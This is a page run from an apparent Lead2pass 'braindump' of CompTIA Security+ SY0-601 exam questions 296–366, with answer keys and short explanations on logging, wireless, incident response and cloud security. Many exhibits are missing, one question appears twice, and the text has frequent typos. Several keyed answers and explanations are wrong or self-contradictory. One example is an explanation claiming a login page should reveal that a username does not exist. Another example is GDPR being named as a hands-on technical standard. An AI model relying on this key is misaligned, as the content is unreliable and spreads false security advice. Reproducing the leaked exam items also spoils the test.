Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
100
C. Host discovery
D. Credentialed
Answer: D
QUESTION 296
A company was recently breached Part of the company's new cybersecurity strategy is to
centralize the logs from all security devices.
Which of the following components forwards the logs to a central source?
A.
B.
C.
D.
Log enrichment
Log aggregation
Log parser
Log collector
Answer: D
Explanation:
Log collectors are pieces of software that function by gathering data from multiple independent
sources and feed it into a unified source such as a SIEM. Log collectors will collect the logs and
then the SIEM solution will store the logs.
QUESTION 297
Given the following logs:
Which of the following BEST describes the type of attack that is occurring?
A.
B.
C.
D.
Rainbow table
Dictionary
Password spraying
Pass-the-hash
Answer: A
Explanation:
Rainbow table attacks are a type of attack that attempts to discover the password from the hash.
A rainbow table is a huge database of possible passwords with the precomputed hashes for
each. It helps to look at the process of how some password cracker applications discover
passwords without a rainbow table. Assume that an attacker has the hash of a password.
QUESTION 298
An organization is concerned that its hosted web servers are not running the most updated
version of the software.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
101
Which of the followi g would work BEST to help identify potential vulnerabilities?
A.
B.
C.
D.
hping3 -S corsptia.org -p 80
nc --1 --v comptia.org -p 80
nmap comptia.org -p 80 --sV
nslookup -port 80 comptia.org
Answer: C
Explanation:
Nmap is used to discover hosts and services on a computer network by sending packets and
analyzing the responses. Nmap provides a number of features for probing computer networks,
including host discovery and service and operating system detection.
QUESTION 299
Which of the following will MOST likely cause machine learning and Al-enabled systems to
operate with unintended consequences?
A.
B.
C.
D.
Stored procedures
Buffer overflows
Data bias
Code reuse
Answer: C
Explanation:
htps://lionbridge.ai/artcles/7-types-of-data-bias-in-machine-learning/
QUESTION 300
An organization blocks user access to command-line interpreters but hackers still managed to
invoke the interpreters using native administrative tools.
Which of the following should the security team do to prevent this from Happening in the future?
A.
B.
C.
D.
Implement HIPS to block Inbound and outbound SMB ports 139 and 445.
Trigger a SIEM alert whenever the native OS tools are executed by the user
Disable the built-in OS utilities as long as they are not needed for functionality.
Configure the AV to quarantine the native OS tools whenever they are executed
Answer: C
QUESTION 301
An analyst has determined that a server was not patched and an external actor exfiltrated data on
port 139.
Which of the following sources should the analyst review to BEST ascertain how the Incident
could have been prevented?
A.
B.
C.
D.
The vulnerability scan output
The security logs
The baseline report
The correlation of events
Answer: B
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
102
QUESTION 302
A local coffee shop runs a small WiFi hotspot for its customers that utilizes WPA2-PSK. The
coffee shop would like to stay current with security trends and wants to implement WPA3 to make
its WiFi even more secure. Which of the following technologies will the coffee shop MOST likely
use in place of PSK?
A.
B.
C.
D.
WEP
MSCHAP
WPS
SAE
Answer: D
QUESTION 303
A security analyst is running a vulnerability scan to check for missing patches during a suspected
security rodent.
During which of the following phases of the response process is this activity MOST likely
occurring?
A.
B.
C.
D.
Containment
Identification
Recovery
Preparation
Answer: B
QUESTION 304
Which of the following is MOST likely to contain ranked and ordered information on the likelihood
and potential impact of catastrophic events that may affect business processes and systems,
while also highlighting the residual risks that need to be managed after mitigating controls have
been implemented?
A.
B.
C.
D.
E.
An RTO report
A risk register
A business impact analysis
An asset value register
A disaster recovery plan
Answer: B
Explanation:
A risk register is a document that records all of your organization's identified risks, the likelihood
and consequences of a risk occurring, the actions you are taking to reduce those risks and who is
responsible for managing them/
QUESTION 305
A network engineer at a company with a web server is building a new web environment with the
following requirements:
- Only one web server at a time can service requests.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
103
- If the primary web server fails, a failover needs to occur to ensure the secondary web server
becomes the primary.
Which of the following load-balancing options BEST fits the requirements?
A.
B.
C.
D.
Cookie-based
Active-passive
Persistence
Round robin
Answer: B
QUESTION 306
A university is opening a facility in a location where there is an elevated risk of theft The university
wants to protect the desktops in its classrooms and labs.
Which of the following should the university use to BEST protect these assets deployed in the
facility?
A.
B.
C.
D.
E.
Visitor logs
Cable locks
Guards
Disk encryption
Motion detection
Answer: B
QUESTION 307
A systems analyst is responsible for generating a new digital forensics chain-of-custody form.
Which of the following should the analyst include in this documentation? (Choose two.)
A.
B.
C.
D.
E.
F.
The order of volatility
A CRC32 checksum
The provenance of the artifacts
The vendor's name
The date and time
A warning banner
Answer: CE
Explanation:
A digital forensics chain-of-custody form is a document that provides a clear and complete record
of the sequence of events that occurs from the time a digital artifact is collected until it is analyzed
and used as evidence. The form should include the date and time when the artifact was collected,
so that the exact time it was obtained can be determined. Additionally, the form should include
information about the provenance of the artifact, such as its origin and any steps that have been
taken to maintain its integrity. The order of volatility, a CRC32 checksum, the vendor’s name, and
a warning banner are not essential components of a digital forensics chain-of-custody form.
QUESTION 308
A company is setting up a web server on the Internet that will utilize both encrypted and
unencrypted web-browsing protocols.
A security engineer runs a port scan against the server from the Internet and sees the following
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
104
output:
Which of the following steps would be best for the security engineer to take NEXT?
A.
B.
C.
D.
Allow DNS access from the internet.
Block SMTP access from the Internet
Block HTTPS access from the Internet
Block SSH access from the Internet.
Answer: D
QUESTION 309
Which of the following is the BEST reason to maintain a functional and effective asset
management policy that aids in ensuring the security of an organization?
A.
B.
C.
D.
To provide data to quantity risk based on the organization's systems.
To keep all software and hardware fully patched for known vulnerabilities
To only allow approved, organization-owned devices onto the business network
To standardize by selecting one laptop model for all users in the organization
Answer: B
QUESTION 310
An attacker was easily able to log in to a company's security camera by performing a baste online
search for a setup guide for that particular camera brand and model.
Which of the following BEST describes the configurations the attacker exploited?
A.
B.
C.
D.
Weak encryption
Unsecure protocols
Default settings
Open permissions
Answer: C
QUESTION 311
A cloud administrator is configuring five compute instances under the same subnet in a VPC.
Three instances are required to communicate with one another, and the other two must he
logically isolated from all other instances in the VPC.
Which of the following must the administrator configure to meet this requirement?
A. One security group
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
105
B. Two security groups
C. Three security groups
D. Five security groups
Answer: B
QUESTION 312
An analyst is trying to identify insecure services that are running on the internal network.
After performing a port scan the analyst identifies that a server has some insecure services
enabled on default ports.
Which of the following BEST describes the services that are currently running and the secure
alternatives for replacing them' (Select THREE)
A.
B.
C.
D.
E.
F.
G.
H.
I.
SFTP FTPS
SNMPv2 SNMPv3
HTTP, HTTPS
TFTP FTP
SNMPv1, SNMPv2
Telnet SSH
TLS, SSL
POP, IMAP
Login, rlogin
Answer: BCF
Explanation:
SNMP v3 adds cryptographic security to SNMP v2. SNMP v3 replaces the simple password
sharing (as clear text) in SNMP v2 with a much more secure encoded security parameters.
HTTPS is HTTP with encryption and verification. The only difference between the two protocols is
that HTTPS uses TLS (SSL) to encrypt normal HTTP requests and responses, and to digitally
sign those requests and responses. As a result, HTTPS is far more secure than HTTP.
Telnet transfers the data in simple plain text. On other hand SSH uses Encrypted format to send
data and also uses a secure channel. As SSH is more secure so it uses public key encryption for
authentication.
QUESTION 313
An attacker was easily able to log in to a company's security camera by performing a basic online
search for a setup guide for that particular camera brand and model.
Which of the following BEST describes the configurations the attacker exploited?
A.
B.
C.
D.
Weak encryption
Unsecure protocols
Default settings
Open permissions
Answer: C
QUESTION 314
A security architect at a large, multinational organization is concerned about the complexities and
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
106
overhead of managing multiple encryption keys securely in a multicloud provider environment.
The security architect is looking for a solution with reduced latency to allow the incorporation of
the organization's existing keys and to maintain consistent, centralized control and management
regardless of the data location.
Which of the following would BEST meet the architect's objectives?
A.
B.
C.
D.
E.
Trusted Platform Module
laaS
HSMaaS
PaaS
Key Management Service
Answer: E
QUESTION 315
A security operations analyst is using the company's SIEM solution to correlate alerts. Which of
the following stages of the incident response process is this an example of?
A.
B.
C.
D.
Eradication
Recovery
Identification
Preparation
Answer: C
QUESTION 316
A company uses specially configured workstations tor any work that requires administrator
privileges to its Tier 0 and Tier 1 systems. The company follows a strict process to harden
systems immediately upon delivery. Even with these strict security measures in place, an incident
occurred from one of the workstations. The root cause appears to be that the SoC was tampered
with or replaced. Which of the following MOST likely occurred?
A.
B.
C.
D.
E.
Fileless malware
A downgrade attack
A supply-chain attack
A logic bomb
Misconfigured BIOS
Answer: C
QUESTION 317
A hospital's administration is concerned about a potential loss of patient data that is stored on
tablets. A security administrator needs to implement controls to alert the SOC any time the
devices are near exits. Which of the following would BEST achieve this objective?
A.
B.
C.
D.
Geotargeting
Geolocation
Geotagging
Geofencing
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
107
Answer: D
QUESTION 318
A SOC is implementing an in sider-threat-detection program. The primary concern is that users
may be accessing confidential data without authorization. Which of the following should be
deployed to detect a potential insider threat?
A.
B.
C.
D.
A honeyfile
ADMZ
DLP
File integrity monitoring
Answer: A
QUESTION 319
A desktop support technician recently installed a new document-scanning software program on a
computer However, when the end user tried to launch the program, it did not respond.
Which of the following is MOST likely the cause?
A.
B.
C.
D.
A new firewall rule is needed to access the application.
The system was quarantined for missing software updates
The software was not added to the application whitelist.
The system was isolated from the network due to infected software.
Answer: C
QUESTION 320
A company has been experiencing very brief power outages from its utility company over the last
few months. These outages only last for one second each time. The utility company is aware of
the issue and is working to replace a faulty transformer. Which of the following BEST describes
what the company should purchase to ensure its critical servers and network devices stay online?
A.
B.
C.
D.
Dual power supplies
A UPS
A generator
APDU
Answer: B
QUESTION 321
After a phishing scam for a user's credentials, the red team was able to craft a payload to deploy
on a server. The attack allowed the installation of malicious software that initiates a new remote
session.
Which of the following types of attacks has occurred?
A.
B.
C.
D.
Privilege escalation
Session replay
Application programming interface
Directory traversal
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
108
Answer: A
QUESTION 322
A security analyst notices several attacks are being blocked by the NIPS but does not see
anything on the boundary firewall logs. The attack seems to have been thwarted. Which of the
following resiliency techniques was applied to the network to prevent this attack?
A.
B.
C.
D.
E.
NIC Teaming
Port mirroring
Defense in depth
High availability
Geographic dispersal
Answer: C
QUESTION 323
A network administrator at a large organization Is reviewing methods to improve the security of
the wired LAN Any security improvement must be centrally managed and allow corporate-owned
devices to have access to the intranet but limit others to Internet access only. Which of the
following should the administrator recommend?
A.
B.
C.
D.
802.1X utilizing the current PKI infrastructure
SSO to authenticate corporate users
MAC address filtering with ACLs on the router
PAM for user account management
Answer: A
QUESTION 324
An organization is having difficulty correlating events from its individual AV. EDR. DLP. SWG.
WAF. MOM. HIPS, and CASB systems. Which of the following is the BEST way to improve the
situation?
A.
B.
C.
D.
Remove expensive systems that generate few alerts.
Modify the systems to alert only on critical issues.
Utilize a SIEM to centralize togs and dashboards.
Implement a new syslog/NetFlow appliance.
Answer: C
QUESTION 325
An attacker is attempting, to harvest user credentials on a client's website. A security analyst
notices multiple attempts of random usernames and passwords. When the analyst types in a
random username and password, the logon screen displays the following message:
Which of the following should the analyst recommend be enabled?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
109
A.
B.
C.
D.
Input validation
Obfuscation
Error handling
Username lockout
Answer: D
Explanation:
When an attacker attempts to log in to a website with a username that does not exist, the website
should display a message indicating that the username does not exist. This will prevent the
attacker from knowing whether or not they have guessed a valid username.
If the website simply displays the message "Incorrect username or password," the attacker will be
able to keep trying different usernames until they find one that works. This could allow the
attacker to gain access to the website even if they do not know the correct password.
Username lockout is a security feature that prevents an attacker from trying to log in with a
particular username too many times. If an attacker exceeds the lockout threshold, they will be
temporarily blocked from trying to log in with that username. This will make it more difficult for the
attacker to gain access to the website.
In this case, the analyst should recommend that the client enable username lockout to prevent
the attacker from guessing valid usernames.
QUESTION 326
A security analyst needs to implement security features across smartphones, laptops, and
tablets. Which of the following would be the MOST effective across heterogeneous platforms?
A.
B.
C.
D.
Enforcing encryption
Deploying GPOs
Removing administrative permissions
Applying MDM software
Answer: D
Explanation:
MDM stands for Mobile Device Management, is software that assists in the implementation of the
process of managing, monitoring, and securing several mobile devices such as tablets,
smartphones, and laptops used in the organization to access the corporate information.
QUESTION 327
The cost of removable media and the security risks of transporting data have become too great
for a laboratory. The laboratory has decided to interconnect with partner laboratories to make
data transfers easier and more secure. The Chief Security Officer (CSO) has several concerns
about proprietary data being exposed once the interconnections are established. Which of the
following security features should the network administrator implement to prevent unwanted data
exposure to users in partner laboratories?
A.
B.
C.
D.
VLAN zoning with a file-transfer server in an external-facing zone
DLP running on hosts to prevent file transfers between networks
NAC that permits only data-transfer agents to move data between networks
VPN with full tunneling and NAS authenticating through the Active Directory
Answer: A
QUESTION 328
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
110
A external forensics investigator has been hired to investigate a data breach at a large enterprise
with numerous assets. It is known that the breach started in the DMZ and moved to the sensitive
information, generating multiple logs as the attacker traversed through the network.
Which of the following will BEST assist with this investigation?
A.
B.
C.
D.
Perform a vulnerability scan to identity the weak spots.
Use a packet analyzer to Investigate the NetFlow traffic.
Check the SIEM to review the correlated logs.
Require access to the routers to view current sessions.
Answer: C
QUESTION 329
The human resources department of a large online retailer has received multiple customer
complaints about the rudeness of the automated chatbots It uses to interface and assist online
shoppers. The system, which continuously learns and adapts, was working fine when it was
installed a few months ago. Which of the following BEST describes the method being used to
exploit the system?
A.
B.
C.
D.
Baseline modification
A fileless virus
Tainted training data
Cryptographic manipulation
Answer: C
QUESTION 330
Joe. a security analyst, recently performed a network discovery to fully understand his
organization's electronic footprint from a "public" perspective. Joe ran a set of commands and
received the following output:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
111
Which of the following can be determined about the organization's public presence and security
posture? (Choose two.)
A.
B.
C.
D.
E.
F.
Joe used Who is to produce this output.
Joe used cURL to produce this output.
Joe used Wireshark to produce this output
The organization has adequate information available in public registration.
The organization has too much information available in public registration.
The organization has too little information available in public registration
Answer: AD
QUESTION 331
A systems administrator needs to install a new wireless network for authenticated guest access.
The wireless network should support 802.1X using the most secure encryption and protocol
available.
Perform the following slops:
1. Configure the RADIUS server.
2. Configure the WiFi controller.
3. Preconfigure the client for an incoming guest.
The guest AD credentials are:
User: guest01
Password: guestpass
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
112
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
113
Answer:
Wifi Controller
SSID: CORPGUEST
SHARED KEY: Secret
AAA server IP: 192.168.1.20
PSK: Blank
Authentication type: WPA2-EAP-PEAP-MSCHAPv2
Controller IP: 192.168.1.10
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
114
Radius Server
Shared Key: Secret
Client IP: 192.168.1.10
Authentication Type: Active Directory
Server IP: 192.168.1.20
Wireless Client
SSID: CORPGUEST
Username: guest01
Userpassword: guestpass
PSK: Blank
Authentication type: WPA2-Enterprise
QUESTION 332
Hotspot Question
The security administration has installed a new firewall which implements an implicit DENY policy
by default.
INSTRUCTIONS
Click on the firewall and configure it to allow ONLY the following communication:
The Accounting workstation can ONLY access the web server on the public network over the
default HTTPS port. The accounting workstation should not access other networks.
The HR workstation should be restricted to communicate with the Financial server ONLY, over
the default SCP port.
The Admin workstation should ONLY be able to access the servers on the secure network over
the default TFTP port.
The firewall will process the rules in a top-down manner in order as a first match. The port
number must be typed in and only one port number can be entered per rule. Type ANY for all
ports.
If at any time you would like to bring back the initial state of the simulation, please click the Reset
All button.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
115
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
116
Answer:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
117
Explanation:
Implicit deny is the default security stance that says if you aren't specifically granted access or
privileges for a resource, you're denied access by default.
Rule #1 allows the Accounting workstation to ONLY access the web server on the public network
over the default HTTPS port, which is TCP port 443.
Rule #2 allows the HR workstation to ONLY communicate with the Financial server over the
default SCP port, which is TCP Port 22
Rule #3 & Rule #4 allow the Admin workstation to ONLY access the Financial and Purchasing
servers located on the secure network over the default TFTP port, which is Port 69.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
118
QUESTION 333
An organization's corporate offices were destroyed due to a natural disaster, so the organization
is now setting up offices in a temporary work space. Which of the following will the organization
MOST likely consult?
A.
B.
C.
D.
The business continuity plan
The disaster recovery plan
The communications plan
The incident response plan
Answer: B
Explanation:
Disaster recovery is prepping to recover the IT operations after a disaster has occurred.
Business continuity is ensure the IT operations are working DURING a disaster.
QUESTION 334
An organization recently recovered from a data breach. During the root cause analysis, the
organization determined the source of the breach to be a personal cell phone that had been
reported lost. Which of the following solutions should the organization implement to reduce the
likelihood of future data breaches?
A.
B.
C.
D.
MDM
MAM
VDI
DLP
Answer: A
QUESTION 335
An organization relies on third-party video conferencing to conduct daily business. Recent
security changes now require all remote workers to utilize a VPN to corporate resources.
Which of the following would BEST maintain high-quality video conferencing while minimizing
latency when connected to the VPN?
A.
B.
C.
D.
Using geographic diversity to have VPN terminators closer to end users
Utilizing split tunneling so only traffic for corporate resources is encrypted
Purchasing higher-bandwidth connections to meet the increased demand
Configuring QoS properly on the VPN accelerators
Answer: D
QUESTION 336
A company just developed a new web application for a government agency. The application must
be assessed and authorized prior to being deployed. Which of the following is required to assess
the vulnerabilities resident in the application?
A. Repository transaction logs
B. Common Vulnerabilities and Exposures
C. Static code analysis
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
119
D. Non-credentialed scans
Answer: C
QUESTION 337
A user must introduce a password and a USB key to authenticate against a secure computer, and
authentication is limited to the state in which the company resides. Which of the following
authentication concepts are in use?
A.
B.
C.
D.
Something you know, something you have, and somewhere you are
Something you know, something you can do, and somewhere you are
Something you are, something you know, and something you can exhibit
Something you have, somewhere you are, and someone you know
Answer: A
QUESTION 338
A bank detects fraudulent activity on user's account. The user confirms transactions completed
yesterday on the bank's website at https://www.company.com. A security analyst then examines
the user's Internet usage logs and observes the following output:
Which of the following has MOST likely occurred?
A.
B.
C.
D.
Replay attack
SQL injection
SSL stripping
Race conditions
Answer: A
QUESTION 339
A company's help desk received several AV alerts indicating Mimikatz attempted to run on the
remote systems. Several users also reported that the new company flash drives they picked up in
the break room only have 512KB of storage. Which of the following is MOST likely the cause?
A. The GPO prevents the use of flash drives, which triggers a false positive AV indication and
restricts the drives to only 512KB of storage.
B. The new flash drives need a driver that is being blocked by the AV software because the flash
drives are not on the application's allow list, temporarily restricting the drives to 512KB of
storage.
C. The new flash drives are incorrectly partitioned, and the systems are automatically trying to
use an unapproved application to repartition the drives.
D. The GPO blocking the flash drives is being bypassed by a malicious flash drive that is
attempting to harvest plaintext credentials from memory.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
120
Answer: B
QUESTION 340
A security analyst is reviewing a penetration-testing report from a third-party contractor. The
penetration testers used the organization's new API to bypass a driver to perform privilege
escalation on the organization's web servers. Upon looking at the API, the security analyst
realizes the particular API call was to a legacy system running an outdated OS.
Which of the following is the MOST likely attack type?
A.
B.
C.
D.
Request forgery
Session replay
DLL injection
Shimming
Answer: D
Explanation:
When an application attempts to call an older driver, the operating system intercepts the call and
redirects it to run the shim code instead.
QUESTION 341
Which of the following utilize a subset of real data and are MOST likely to be used to assess the
features and functions of a system and how it interacts or performs from an end user's
perspective against defined test cases? (Choose two.)
A.
B.
C.
D.
E.
F.
Production
Test
Research and development
PoC
UAT
SDLC
Answer: BE
QUESTION 342
A network administrator is concerned about users being exposed to malicious content when
accessing company cloud applications. The administrator wants to be able to block access to
sites based on the AUP. The users must also be protected because many of them work from
home or at remote locations, providing on-site customer support.
Which of the following should the administrator employ to meet these criteria?
A.
B.
C.
D.
Implement NAC.
Implement an SWG.
Implement a URL filter.
Implement an MDM.
Answer: B
Explanation:
A secure web gateway (SWG) protects users from web-based threats in addition to applying and
enforcing corporate acceptable use policies.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
121
QUESTION 343
An information security officer at a credit card transaction company is conducting a frameworkmapping exercise with the internal controls. The company recently established a new office in
Europe. To which of the following frameworks should the security officer map the existing
controls? (Choose two.)
A.
B.
C.
D.
E.
F.
ISO
PCI DSS
SOC
GDPR
CSA
NIST
Answer: BD
QUESTION 344
Several large orders of merchandise were recently purchased on an e-commerce company's
website. The totals for each of the transactions were negative values, resulting in credits on the
customers' accounts. Which of the following should be implemented to prevent similar situations
in the future?
A. Ensure input validation is in place to prevent the use of invalid characters and values.
B. Calculate all possible values to be added together and ensure the use of the proper integer in
the code.
C. Configure the web application firewall to look for and block session replay attacks.
D. Make sure transactions that are submitted within very short time periods are prevented from
being processed.
Answer: A
QUESTION 345
To mitigate the impact of a single VM being compromised by another VM on the same hypervisor,
an administrator would like to utilize a technical control to further segregate the traffic.
Which of the following solutions would BEST accomplish this objective?
A.
B.
C.
D.
Install a hypervisor firewall to filter east-west traffic.
Add more VLANs to the hypervisor network switches.
Move exposed or vulnerable VMs to the DMZ.
Implement a zero-trust policy and physically segregate the hypervisor servers.
Answer: A
QUESTION 346
A nationwide company is experiencing unauthorized logins at all hours of the day. The logins
appear to originate from countries in which the company has no employees.
Which of the following controls should the company consider using as part of its IAM strategy?
(Choose two.)
A. A complex password policy
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
122
B.
C.
D.
E.
F.
Geolocation
An impossible travel policy
Self-service password reset
Geofencing
Time-based logins
Answer: EF
Explanation:
Time-based authentication is a special procedure to prove an individual's identity and authenticity
on appearance simply by detecting its presence at a scheduled time of day or within a scheduled
time interval and on a distinct location.
Geo-Fencing, as the name suggests, lets IT administrators restrict the usage of corporate devices
to certain regions such as office premises etc. This is done by creating virtual fences called geofence, based on real-world geographical region. Geo-fencing can be ideally used in enterprises
with stringent compliance standards which require corporate devices containing sensitive data to
remain within the organization's premises at all times. MDM lets you define security policies
based on the virtual perimeter created as a geofence, ensuring there is no unauthorized
corporate data access.
QUESTION 347
An organization has expanded its operations by opening a remote office. The new office is fully
furnished with office resources to support up to 50 employees working on any given day.
Which of the following VPN solutions would BEST support the new office?
A.
B.
C.
D.
Always On
Remote access
Site-to-site
Full tunnel
Answer: C
Explanation:
Site-to-site VPN provides secure connectivity between two or more geographically dispersed
locations, such as a main office and a remote office. It is a good choice when multiple users need
to access network resources from the remote office, as it allows all the users in the remote office
to securely connect to the main office network using a single VPN connection. This solution
provides a secure, encrypted tunnel between the two sites, allowing traffic to flow securely
between them.
QUESTION 348
A security analyst has been reading about a newly discovered cyber attack from a known threat
actor. Which of the following would BEST support the analyst's review of the tactics, techniques,
and protocols the threat actor was observed using in previous campaigns?
A.
B.
C.
D.
Security research publications
The MITRE ATT&CK framework
The Diamond Model of Intrusion Analysis
The Cyber Kill Chain
Answer: B
Explanation:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
123
The MITRE ATT&CK Framework was created by MITRE in 2013 to document attacker tactics
and techniques based on real-world observations. This index continues to evolve with the threat
landscape and has become a renowned knowledge base for the industry to understand attacker
models, methodologies, and mitigation.
QUESTION 349
Which of the following is the correct order of volatility from MOST to LEAST volatile?
A.
B.
C.
D.
Memory, temporary filesystems, routing tables, disk, network storage
Cache, memory, temporary filesystems, disk, archival media
Memory, disk, temporary filesystems, cache, archival media
Cache, disk, temporary filesystems, network storage, archival media
Answer: B
QUESTION 350
After installing a Windows server, a cybersecurity administrator needs to harden it, following
security best practices. Which of the following will achieve the administrator's goal? (Choose
two.)
A.
B.
C.
D.
E.
F.
Disabling guest accounts
Disabling service accounts
Enabling network sharing
Disabling NetBIOS over TCP/IP
Storing LAN manager hash values
Enabling NTLM
Answer: AD
QUESTION 351
Accompany deployed a WiFi access point in a public area and wants to harden the configuration
to make it more secure. After performing an assessment, an analyst identifies that the access
point is configured to use WPA3, AES, WPS, and RADIUS. Which of the following should the
analyst disable to enhance the access point security?
A.
B.
C.
D.
WPA3
AES
RADIUS
WPS
Answer: D
Explanation:
Wifi Protected Setup - Even though WPS offers this convenience, it is appallingly insecure.
Wireless networks with WPS enabled are highly vulnerable to cybersecurity threats. Attackers
can easily target the WPS function to steal network passwords, regardless of how complex the
password is.
QUESTION 352
Which of the following distributes data among nodes, making it more difficult to manipulate the
data while also minimizing downtime?
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
124
A.
B.
C.
D.
MSSP
Public cloud
Hybrid cloud
Fog computing
Answer: D
Explanation:
Computing uses multiple nodes while Edge computing uses single node.
QUESTION 353
A500 is implementing an insider threat detection program, The primary concern is that users may
be accessing confidential data without authorization. Which of the fallowing should be deployed to
detect a potential insider threat?
A.
B.
C.
D.
A honeyfile
A DMZ
ULF
File integrity monitoring
Answer: A
QUESTION 354
A security assessment found that several embedded systems are running unsecure protocols.
These Systems were purchased two years ago and the company that developed them is no
longer in business.
Which of the following constraints BEST describes the reason the findings cannot be remediated?
A.
B.
C.
D.
inability to authenticate
Implied trust
Lack of computing power
Unavailable patch
Answer: D
QUESTION 355
A security analyst needs to find real-time data on the latest malware and IoCs. Which of the
following would BEST describes the solution the analyst should pursue?
A.
B.
C.
D.
Advisories and bulletins
Threat feeds
Security news articles
Peer-reviewed content
Answer: B
QUESTION 356
A web server has been compromised due to a ransomware attack. Further investigation reveals
the ransomware has been in the server for the past 72 hours. The systems administrator needs to
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
125
get the services back up as soon as possible. Which of the following should the administrator use
to restore services to a secure state?
A.
B.
C.
D.
The last incremental backup that was conducted 72 hours ago
The last known-good configuration
The last full backup that was conducted seven days ago
The baseline OS configuration
Answer: C
Ransomware will most likely render the web server unusable and must be isolated for forensic
investigation. This will leave the only option to start a new web server from scratch and restore
the last full backup, plus any differential or incremental backups which are sure to be clean from
ransomware (if available).
QUESTION 357
Which of the following would cause a Chief Information Security Officer (CISO) the MOST
concern regarding newly installed Internet-accessible 4K surveillance cameras?
A.
B.
C.
D.
An inability to monitor 100%, of every facility could expose the company to unnecessary risk.
The cameras could be compromised if not patched in a timely manner.
Physical security at the facility may not protect the cameras from theft.
Exported videos may take up excessive space on the file servers.
Answer: A
QUESTION 358
A financial institution would like to store its customer data in a cloud but still allow the data to be
accessed and manipulated while encrypted. Doing so would prevent the cloud service provider
from being able to decipher the data due to its sensitivity. The financial institution is not
concerned about computational overheads and slow speeds. Which of the following cryptographic
techniques would BEST meet the requirement?
A.
B.
C.
D.
Asymmetric
Symmetric
Homomorphic
Ephemeral
Answer: C
Explanation:
Homomorphic encryption is a form of encryption that permits users to perform computations on its
encrypted data without first decrypting it.
QUESTION 359
A major political party experienced a server breach. The hacker then publicly posted stolen
internal communications concerning campaign strategies to give the opposition party an
advantage. Which of the following BEST describes these threat actors?
A. Semi-authorized hackers
B. State actors
C. Script kiddies
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
126
D. Advanced persistent threats
Answer: B
Explanation:
State actor - A type of threat actor that is supported by the resources of its host country's military
and security services.
QUESTION 360
Which of the following often operates in a client-server architecture to act as a service repository,
providing enterprise consumers access to structured threat intelligence data?
A.
B.
C.
D.
STIX
CIRT
OSINT
TAXII
Answer: A
Explanation:
STIX is acting as a service repository (which is asked in a question)providing enterprise
consumers access to structured threat intelligence data, TAXII is a vector or transport for STIX
data .
QUESTION 361
A security analyst is reviewing the following output from a system:
Which of the following is MOST likely being observed?
A.
B.
C.
D.
ARP poisoning
Man in the middle
Denial of service
DNS poisoning
Answer: C
Explanation:
Once you realize the destination IP and port are on the left the answer is easier to understand.
Multiple source ports trying to connect to the same destination IP and port means DOS.
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
127
QUESTION 362
Which of the following would a European company interested in implementing a technical, handson set of security standards MOST likely choose?
A.
B.
C.
D.
GDPR
CIS controls
ISO 27001
ISO 37000
Answer: A
Explanation:
In the wake of technological developments and globalisation and the constitutionalisation of the
fundamental right to data protection in the EU, the General Data Protection Regulation (GDPR)
aims to harmonise the framework for the digital single market, put individuals in control of their
data and formulate a modern data protection governance.
QUESTION 363
A security researcher is attempting to gather data on the widespread use of a Zero-day exploit.
Which of the following will the researcher MOST likely use to capture this data?
A.
B.
C.
D.
A DNS sinkhole
A honeypot
A vulnerability scan
cvss
Answer: B
QUESTION 364
An engineer is setting up a VDI environment for a factory location, and the business wants to
deploy a low-cost solution to enable users on the shop floor to log in to the VDI environment
directly. Which of the following should the
engineer select to meet these requirements?
A.
B.
C.
D.
Laptops
Containers
Thin clients
Workstations
Answer: C
QUESTION 365
A security analyst is reviewing the following command-line output:
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
128
Which of the following Is the analyst observing?
A.
B.
C.
D.
IGMP spoofing
URL redirection
MAC address cloning
DNS poisoning
Answer: C
QUESTION 366
While reviewing the wireless router, the systems administrator of a small business determines
someone is spoofing the MAC address of an authorized device. Given the table below:
Which of the following should be the administrator's NEXT step to detect if there is a rogue
system without impacting availability?
A.
B.
C.
D.
Conduct a ping sweep.
Physically check each system.
Deny Internet access to the "UNKNOWN" hostname.
Apply MAC filtering.
Answer: B
Explanation:
The question is if the unknown hostname is a rogue system. Ping will not help. Will only show it is
connected and he already knows that. Denying access to the internet is not detecting anything
Get Latest & Actual SY0-601 Exam's Question and Answers from Lead2pass.
https://www.lead2pass.com
129
